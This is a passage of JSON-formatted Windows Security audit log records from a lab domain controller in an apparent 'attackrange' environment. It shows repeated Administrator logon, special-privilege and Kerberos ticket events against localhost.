05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220508,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B4C4\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b4c4","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220509,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B4C4\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6b4c4","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220510,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220511,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220512,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220513,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B787\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b787","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220514,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B787\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6b787","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220515,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220516,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220517,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220518,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B9C0\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6b9c0","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220519,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6B9C0\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special 